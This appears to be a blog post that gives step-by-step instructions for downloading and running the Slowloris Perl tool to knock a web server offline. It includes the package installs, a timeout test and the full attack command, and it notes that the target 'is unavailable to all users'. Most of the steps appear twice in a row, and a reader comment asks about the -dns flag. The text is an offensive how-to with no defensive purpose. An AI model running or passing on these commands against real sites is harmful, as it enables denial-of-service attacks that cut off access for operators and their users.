(1)Open a browser and go to this URL: ‘http://ha.ckers.org/slowloris‘ (here you can know more about what is SLOWLORIS, & what it can do)
(2)Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to your desktop.
(3)Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.
(4)Then type in your terminal:
sudo apt-get install perl-doc
and enter your password when prompted. This installs the Perl documentation module you’ll need to see the Slowloris help page. Wait while the packages download and install.
(5)Then type this command, (all in one line) and press enter:
sudo apt-get install libhtml-parser-perl libio-socket-ssl-perl
(6)When ask yes/no type Y and press enter, this installs some libraries for Slowloris.
Again type another command, this time:
perldoc slowloris.pl
and hit enter. This will show the documentation for Slowloris. I usually type Crtl+X+Y=enter to save it as a record but if you like you can just scan it and type Crtl+X to get rid of it.
(7)Next you should type
sudo perl slowloris.pl -dns example.com -port 80 -test
hit enter and password if requested. This tests the server to see what it’s timeout window is. Wait until the test finishes, it will take several minutes. When it’s done it will tell you what timeout value to use….something along the likes of ‘Use 240 seconds for -timeout’.
(8)In the terminal window type,
sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5
This performs the actual attack, if your time out test told you to use another timeout value use that.
(9)In your browser window reload the target page and you should see an error message that the server is unavailable. The attack has made the target site unavailable to all users.
To stop the attack just type Ctrl+C.
(2)Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to your desktop.
(3)Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.
(4)Then type in your terminal:
sudo apt-get install perl-doc
and enter your password when prompted. This installs the Perl documentation module you’ll need to see the Slowloris help page. Wait while the packages download and install.
(5)Then type this command, (all in one line) and press enter:
sudo apt-get install libhtml-parser-perl libio-socket-ssl-perl
(6)When ask yes/no type Y and press enter, this installs some libraries for Slowloris.
Again type another command, this time:
perldoc slowloris.pl
and hit enter. This will show the documentation for Slowloris. I usually type Crtl+X+Y=enter to save it as a record but if you like you can just scan it and type Crtl+X to get rid of it.
(7)Next you should type
sudo perl slowloris.pl -dns example.com -port 80 -test
hit enter and password if requested. This tests the server to see what it’s timeout window is. Wait until the test finishes, it will take several minutes. When it’s done it will tell you what timeout value to use….something along the likes of ‘Use 240 seconds for -timeout’.
(8)In the terminal window type,
sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5
This performs the actual attack, if your time out test told you to use another timeout value use that.
(9)In your browser window reload the target page and you should see an error message that the server is unavailable. The attack has made the target site unavailable to all users.
To stop the attack just type Ctrl+C.
1 comment:
what is the purpose of -dns in this query.
(sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5)
Post a Comment